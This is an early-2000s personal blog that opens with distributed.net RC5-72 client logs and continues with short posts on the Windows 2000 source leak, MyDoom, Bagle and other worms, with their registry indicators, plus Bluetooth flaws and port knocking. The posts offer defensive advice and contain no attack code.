[Feb 18 13:55:01 UTC] Automatic processor detection found 8 processors.
[Feb 18 13:55:01 UTC] Loading crunchers with work...
[Feb 18 13:55:01 UTC] Automatic processor type detection found an UltraSPARC-III processor.
[Feb 18 13:55:01 UTC] RC5-72: using core #5 (AnBe 2-pipe).
[Feb 18 13:55:01 UTC] RC5-72: Loaded 53:9A5FEBB8:00000000:1*2^32 (6.80% done)
[Feb 18 13:55:02 UTC] RC5-72: Loaded 53:9947E99C:00000000:1*2^32 (6.70% done)
[Feb 18 13:55:02 UTC] RC5-72: Loaded 53:9583A941:00000000:1*2^32 (6.80% done)
[Feb 18 13:55:02 UTC] RC5-72: Loaded 53:9B417340:00000000:1*2^32 (6.80% done)
[Feb 18 13:55:02 UTC] RC5-72: Loaded 53:98C860A2:00000000:1*2^32 (6.70% done)
[Feb 18 13:55:02 UTC] RC5-72: Loaded 53:90F00E5E:00000000:1*2^32 (6.70% done)
[Feb 18 13:55:03 UTC] RC5-72: Loaded 53:98DFFC29:00000000:1*2^32 (7.00% done)
[Feb 18 13:55:03 UTC] RC5-72: Loaded 53:9E7DB352:00000000:1*2^32 (6.80% done)
[Feb 18 13:55:03 UTC] RC5-72: 192 packets (192.00 stats units) remain in buff-in.r72
[Feb 18 13:55:03 UTC] RC5-72: 0 packets are in buff-out.r72
[Feb 18 13:55:03 UTC] 8 crunchers ('a'-'h') have been started.
.....10%.....20%.....30%.....40%.....50%.....60%.....70%.....80%.....90%....100

snip ..

[Feb 18 14:33:05 UTC] RC5-72: Completed 53:90F00E5E:00000000 (1.00 stats units) 0.00:38:02.27 - [1,755,119 keys/s]
[Feb 18 14:33:06 UTC] RC5-72: Loaded CA:8072EC53:00000000:1*2^32
[Feb 18 14:33:06 UTC] RC5-72: Summary: 8 packets (8.00 stats units) 0.00:38:07.08 - [14.00 Mkeys/s]
[Feb 18 14:33:07 UTC] RC5-72: 184 packets (184.00 stats units) remain in buff-in.r72
Projected ideal time to completion: 0.15:26:31.00
[Feb 18 14:33:07 UTC] RC5-72: 8 packets (8.00 stats units) are in buff-out.r72

That's 8 blocks done in no time already on the one Sun Fire, the same amount are being kicked out on the other Sun Fire too. I wonder if I will be able to get my rate up to the level I had it at in the past? Anyway, if you're interested in joining and helping out by donating your idle CPU cycles then head on over to www.distributed.net - If you want to sumbit your blocks to the team I am part of then join up to Valve Media.

Post ID: 277, posted by jase at 02:03 PM
Permalink | Post / View Comments (0) | TrackBack ID: 252, (3) | Google Search

Monday, February 16, 2004

MS source code leak - bugs already

As expected, after the code leak there have already been some bugs discovered which just goes to show how bug infested MS code probably is. If it was released to the open world, a lot more audting could be done and the code would be a lot better.

The first bug was discovered some time ago, but a working exploit was not produced or not released anyway. Days after the source appeared and started to quickly spread a proof of concept exploit was released. The other bug found affects bitmap processing code in IE 5 & some versions of Outlook Express, a working exploit has also been released.

Since MS releases the source code to selected partners and such, maybe they should just do everyone a favour and release it to everyone. Or more people at least, so a proper audit can take place which would make things a lot better.

Bugs, some very complicated to reproduce can still be discovered even with closed source. The debate about closed source being more secure, via security through obscurity is pointless - as proven by these latest events.

I'm sure there will be more to come...

Post ID: 276, posted by jase at 10:31 PM
Permalink | Post / View Comments (0) | TrackBack ID: 251, (1) | Google Search

Friday, February 13, 2004

Windows 2000 source code leak

You would not think it (Due to Source Safe) and other measures, but MS Windows 2000 source has been leaked. But not from Microsoft & it does not appear that all of it has got out.

It seems the code has been taken from a Linux box, so the types of protection used by MS will not be in place, especially since the leak appears to have come from a third party called Mainsoft.

Details are limited at the moment, but MS have launched an investigation with the FBI. I would think that the most that is at risk for MS is intellectual property.

More information is available from Neowin & Betanews.

Post ID: 273, posted by jase at 07:25 PM
Permalink | Post / View Comments (0) | TrackBack ID: 248, (3) | Google Search

Thursday, February 12, 2004

Nachi-B aka Welchi

Yet another worm appears to have surfaced, spreading via exploiting the same vulnerability that Blaster did. It appears to be another one looking for MyDoom infections which if found it clears up. It also downloads the patches from Microsoft to fix the DCOM RPC service hole which allowed it to gain access.

These kinds of clean up another infection seem to be happening more often these days, it's kind of like a game various authors are playing with each other to outwit each other by releasing worms and virii that clean up someone else's previous attempts.

In some respects this is good - especially if something like MyDoom was not programmed to self destruct and become dormant.

This new version of Nachi could cause problems, like the original did in terms of a lot of network activity generated. It creates a file called "svchost.exe" in Windows\System\Drives.

A trojan that has just surfaced is called Mitglieder.H. It creates an SMTP proxy that listens on port 35555. This will be enjoyed by spammers unfortunately, if it spreads a lot. It creates the following registry key:

[HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

"ssgrate.exe" = "%winsysdir%\system.exe"

It also creates [HKCU\SOFTWARE\DateTime].

This is another piece of malware that is exoploiting the backdoor left by MyDoom. On the day the MyDoom stops its attack on SCO.COM and stops spreading, the problem of the backdoor staying active remains which will give rise to the amount of variants and other things that will use this backdoor. Since the amount of infected hosts is so high and the rate at which MyDoom spread, I'm sure we will see a lot of side effects caused by other malware using the traces of MyDoom left behind.

Time to upgrade your AV again, if it's not done automatically.

Post ID: 269, posted by jase at 06:16 PM
Permalink | Post / View Comments (0) | TrackBack ID: 244, (3) | Google Search

Wednesday, February 11, 2004

Nokia Bluetooth vulnerabilities

I read the article on Slashdot on Tuesday about the bugs that have been found regarding certain Nokia handsets and their Bluetooth inplementations. It seems a few flaws exist which can allow for data to be extracted from your handset without you even knowing - another reason for you to keep Bluebooth switched off when not in use - especially if you have a handset which is vulnerable.

Check out Bluestumbler for the full low down on the bugs, or see the ZD Net article.

These issues are obviously raising concern as personal and confidential data could be extracted fairly easily. Nokia is aware of the issues, but won't really be able to do much about it with existing handsets unless people were to upgrade the fireware.

Phone contact details from the address book is amongst some of the data that could be extracted.

So turn off Bluetooth when not in use!

Post ID: 268, posted by jase at 11:38 PM
Permalink | Post / View Comments (0) | TrackBack ID: 243, (0) | Google Search

Tuesday, February 10, 2004

MyDoom-C aka Doomjuice & Vesser aka Deadhat

Yet more worms appear to be spreading around, these two looking for machines already infected by MyDoom and MyDoom-B. It seems that Doomjuice first appeared yesterday and Vesser was first picked up by AV firms on Saturday. MyDoom-C does not spread by email at all and doesn't launch an attack on SCO - instead it's going after Microsoft.

Doomjuice copies itself to the system directory, calling itself "intrenat.exe".
And adds the following rigistry keys:

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Gremlin HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Gremlin

Vesser spreads via MyDoomA/B and also via the Soulseek network.

The following registry key is added
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KernelFaultChk and the file "sms.exe" is added to the machine. It removes any previous MyDoom infections from the machine and spreads via Soulseek by adding itself as various files to the shared directory. There appears to be an IRC backdoor and remote update feature. It also tries to kill processes with certain names, common AV applications and scanners.

Go and update your signature files now.

Post ID: 266, posted by jase at 01:52 PM
Permalink | Post / View Comments (0) | TrackBack ID: 241, (2) | Google Search

Sunday, February 8, 2004

Port Knocking

I just noticed a post on /. about this idea - from what has been said so far it could be quite a handy security measure and would add to the existing security measures we all have in place. There is plenty of information regarding this on portknocking.org

So the idea behind it?

Well, you connect you a certain number of ports in a certain way and boom - you are then allowed to connect to a specific service. For example, you could limit ssh to not only run on a different port but also only allow connections to the ssh daemon after the correct knocking has been done. It could be incorporated with a firewall which adds dynamic rules on demand so you can connect to the SSH server from your current host for a certain time period after the knock, afterwards the firewall rule can be removed and you can no longer connect.

The port to which you finally connect could also be dynamic and change with each use, which also increases security. Users could use a script to initiate the knocking automatically so no extra work is needed. I think there is a lot that could be done with this, looks like an interesting project. Obviosly it's only going to be of use in certain situations and for certain services where only known users will be connecting.

For services like http and smtp which are generally public there would not be much use. But for private services such as SSH, POP3 or non anonymous FTP for example this is perfect. There is a lot of information on the site - I'm going to have a full read later. Make sure you check it out.

Post ID: 264, posted by jase at 11:39 PM
Permalink | Post / View Comments (1) | TrackBack ID: 239, (0) | Google Search

Saturday, February 7, 2004

Infosec Europe 2004

It's about time to pre-register for this event if you are planning on going because it is free at the moment. If you turn up on the day you will have to pay. I've registered every year for the past how many and not actually got round to going. But this year, I will make it.

There will be a lot of companies there showing off their new products and also lots of different seminars to visit. I've already registered, so now just got to wait for the pack to come through.

Infosec Europe 2004

Post ID: 263, posted by jase at 06:27 PM
Permalink | Post / View Comments (0) | TrackBack ID: 238, (3) | Google Search

Thursday, January 29, 2004

MyDoom-B in the wild

Various sites are reporting that there is a new variant of the MyDoom worm in the wild and spreading on the Internet. This version appears to attack back SCO.COM and MICROSOFT.COM but details are limited at the moment. It has probably been developed by the same author of the original. I'm assuming (even though you should never assume) that the attack will start on the same date, but we'll have to wait for more information to filter through.

Looks like it is going to be a bit gloomy for MS and SCO - the question is - will their sites hold up?

Tuesday, January 27, 2004

Novarg aka MyDoom

Yet another Windows based mass mailing email worm appears to be out there. This one, looks like it's going to cause issues for SCO's website, between February 1st - 12th by flooding it with GET requests. Users should check for the file "shimgapi.dll" on your systems. Ports 3127-3198 are opened up, so blocking these ports at the firewall would be a good idea.

Check out the Symantec Analysis

Post ID: 250, posted by jase at 12:22 PM
Permalink | Post / View Comments (0) | TrackBack ID: 225, (0) | Google Search

Tuesday, January 20, 2004

Damn, what was my login?!

Over the past 6 years of my Internet use, I have signed up to a lot of services. Most which I usually forget about and don't use, but at some point will come back to. Providing the accounts have not been deleted for non use over long periods of time, there is still the case of having to remember login details.

It's even more trouble when I can't remember which email address I used to register so that I can have your password mailed to me. Maybe I should employ some sort of account management so these troubles are reduced when I do return to use a service after a long break.

I'm sure I'm not alone in having these issues. It would be a lot easier if we all used the same userid's and passwords for various services we use, but of course we don't do this - for obvious reasons. Which is why management comes in. Or doesn't, due to lack of motivation.

Sometimes it ends up in an email to support to find out various details.
All is not lost, just takes a little time - but if the effort had been put in initially the extra effort would not be needed now. An interesting point to note when thinking along the lines of "I'll do it later" - Make the better (read: right) choice and do it now.

Post ID: 242, posted by jase at 11:40 PM
Permalink | Post / View Comments (0) | TrackBack ID: 217, (3) | Google Search

Monday, January 19, 2004

W32.Beagle.A@mm

Various sites are reporting about a new email based worm called Bagle. Of course, it follows the list we already know - in other words - it only affects windows users and you do have to open an attachment. It appears that the email comes with a subject of "Test" and in the body of the message are the words "Test, yep." However this information could be variable.

It appears to add this key to the registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"d3update.exe"="%system%\bbeagle.exe"

And copies itself to the system directory under the filename "bbeagle.exe".
It also runs "calc.exe" and then appempts to download "TrojanProxy.Win32.Mitgleide" from a number of sites and then execute it. It tries to scan local disks for email addresses, which it will then send itself to by using a built in SMTP service.

With an expiry date of 28th January, I doubt it will cause much of an issue. Biut even so, update your anti-virus patterns and don't open attachments from unknown senders or indeed any attachment that looks suspect.

For more information, see visit one of your local antivirus supplier.

Post ID: 240, posted by jase at 05:55 PM
Permalink | Post / View Comments (0) | TrackBack ID: 215, (0) | Google Search

Friday, December 26, 2003

Blaster still on the prowl

Well it seems that even after the efforts by ISP's to limit the effects of Blaster, there are still paths for infected machines to scan and spread the worm.

You may recall my recent problems with installing Windows 2000 Professional on the new box for my brother. I'm not sure what was causing the problem with the .SIF file that it was talking about, as I could not locate any .SIF file.

Anyway, instead of messing about with that I decided to install Windows XP Professional. Since it did not really make any difference. Although, maybe I should have installed Linux and let him play with that. He's only just getting into the PC thing (age 13) so I could make him start off on the right foot in the first place.

After getting XP installed and the box online, I got some updates installed from Windows Update, but not everything as he wanted to play. Okay, I thought - I'll come back later and sort everything else out, so I moved the box through to his room and got it all up and running. When installing Antivirus later, it informed me that Blaster was present.

I noticed when I had the box online and in my room that the RPC services failed and the system rebooted as that is the default action when RPC fails. I didn't think anything of it. After some reading, I found that sometimes RPC can crash when an infected box is trying to exploit the vulnerability, so it must have been exploited then.

Shortly after using the removal tool from Symantec and then finishing off the updates, all was good. Now I've got round to sorting the firewall, there should be no more issues.

I just need to configure stuff on the system now. But all seems okay!
I've learnt though, when getting a Windows system online and getting it all updated, do it all at once - straight away!

Post ID: 210, posted by jase at 11:20 PM
Permalink | Post / View Comments (0) | TrackBack ID: 187, (4) | Google Search

Monday, December 1, 2003

.Name registry site defaced

The web site defacements are still taking place, obviously. Even though there are not as many sites mirroring all of them as there used to be. This time, it's the turn of the .name registry.

Let us hope that they now increase security and are more aware of it so something like this does not happen again, else they will be a laughing stock!

Post ID: 182, posted by jase at 09:31 AM
Permalink | Post / View Comments (0) | TrackBack ID: 160, (5) | Google Search

Monday, November 3, 2003

Apache: mod_security

Just reading Ben's Thought Crimes, I noticed his post about mod_security for Apache. There were recently some security problems with this but they have now been fixed. Seems like a good idea and an addition to any conventional IDS, like Tripwire for example. It's interesting to see how many Windows vulnerabilities (http based, etc) are tried on *nix servers & also how many old exploits are still tried. The random scanning and trying of exploits by various tools on systems continues, so http based IDS has a market there.

Post ID: 141, posted by jase at 10:39 PM
Permalink | Post / View Comments (0) | TrackBack ID: 127, (0) | Google Search